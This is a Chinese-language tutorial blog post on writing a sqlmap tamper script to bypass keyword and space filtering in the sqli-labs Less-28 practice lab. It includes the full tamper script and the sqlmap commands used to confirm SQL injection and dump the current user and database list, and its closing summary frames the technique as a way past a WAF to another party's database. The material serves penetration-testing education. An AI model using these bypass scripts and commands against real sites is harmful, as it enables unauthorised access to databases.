sqlmap繞過WAF腳本編寫
前言
一、什么是sqlmap和tamper腳本
Sqlmap一款功能強大集成了多種數(shù)據(jù)庫識別及注入方式,多用于識別和利用Web 應用程序注入漏洞的工具,它的優(yōu)點在于集成了大量 payload,對檢測與利用的自動化處理(數(shù)據(jù)庫指紋、訪問底層文件系統(tǒng)、執(zhí)行命令)。 我們之前學習時間盲注的時候,可以針對時間盲注類型的漏洞的寫個專門的自動化腳本來幫忙我們測試,但是不比這個sqlmap這個集成工具強大。
1.tamper的作用
使用SQLMap提供的tamper腳本,可在一定程度上避開應用程序的敏感字符過濾、繞過WAF規(guī)則的阻擋,繼而進行滲透攻擊。
部分防護系統(tǒng)的縮寫:
WAF:Web應用程序防火墻,Web Application Firewall
IPS:入侵防御系統(tǒng), Intrusion Prevention System
IDS:入侵檢測系統(tǒng),Intrusion Detection System
2.tamper用法
–tamper=TAMPER 利用給定的腳本進行篡改注入數(shù)據(jù)。其用法可舉例說明:
python sqlmap.py -u “http://…/?uname=admin&pwd=pass123”?--level=5?--risk=3 -p “uname” --tamper=xxx.py
表示對指定的url地址,以所設置的level等級、risk等級,并采用選定的tamper篡改腳本對參數(shù)“uname”進行檢測
二、利用sqlmap腳本進行掃描獲取數(shù)據(jù)庫信息
1.編寫sqlmap繞過WAF腳本
利用sqli-labs實驗室第28關(guān)進行實驗,進行代碼審計可知
代碼中對各種符號,空格進行了過濾,說明存在WAF,我們可以進行編寫sqlmap腳本進行繞過,這里編寫一個sqli-labs28.py腳本到sqlmap的tamper目錄下
腳本模板如下:
#!/usr/bin/env python
“”"
Copyright ? 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
priority = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
“”"
Bypass sqli-lasbs/Less-28
“”"
if payload:
payload = payload.replace(‘union select’,‘unnion all select’).replace(’ ‘,’%0a’)
return payload
2.通過sqlmap進行獲取數(shù)據(jù)庫信息
這里我在window下使用sqlmap,搭建python環(huán)境進行運行
首先,進行對目標url進行掃描
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session
掃描結(jié)果可知,id參數(shù)沒有存在注入點,這里我們腳本僥幸掃描試試是否可以繞過過濾點進行注入,獲取信息。
輸入腳本文件
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session --tamper=sqli-labs28
由測試結(jié)果可知,注入成功,接下來我們獲取數(shù)據(jù)信息
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --current-user(輸出當前用戶)
由結(jié)果可知,獲取信息成功,接下來我們獲取有哪些數(shù)據(jù)庫
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --dbs -v 3(通過payload獲取數(shù)據(jù)庫內(nèi)容)
由以上結(jié)果可知,數(shù)據(jù)庫信息獲取成功,實驗結(jié)束。
接下來大家就可以利用sqlmap核心語法獲取更多的信息。文章來源:http://www.zghlxwxcb.cn/news/detail-491205.html
總結(jié)
本次實驗是利用sqlmap編寫腳本繞過WAF的一個經(jīng)典實例,通過代碼審計發(fā)現(xiàn)存在符號和空格過濾,我們就可以進行編寫腳本進行繞過,這樣我們就可以通過繞過WAF,獲取對方的數(shù)據(jù)庫信息了。文章來源地址http://www.zghlxwxcb.cn/news/detail-491205.html
到了這里,關(guān)于滲透測試-sqlmap繞過WAF腳本編寫的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!